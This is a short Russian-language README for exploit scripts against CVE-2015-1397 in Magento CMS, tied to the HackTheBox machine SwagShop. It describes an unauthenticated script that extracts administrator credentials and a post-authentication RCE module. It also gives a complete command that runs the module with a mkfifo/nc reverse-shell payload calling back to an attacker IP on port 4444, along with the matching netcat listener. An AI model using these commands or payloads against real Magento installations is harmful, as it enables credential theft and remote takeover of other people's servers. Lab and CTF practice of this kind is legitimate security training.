
Эксплойт-скрипты для CVE-2015-1397 в Magento CMS, включая эксплойт без аутентификации для получения учётных данных администратора и модуль RCE после аутентификации для выполнения reverse shell.
Уязвимость, как показано в HackTheBox - SwagShop
Получить учетные данные администратора для панели управления Magento CMS
С учетными данными, полученными из exploit.py, добавленными в post_auth.py, выполните:
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"
Слушатель:
nc -lvnp 4444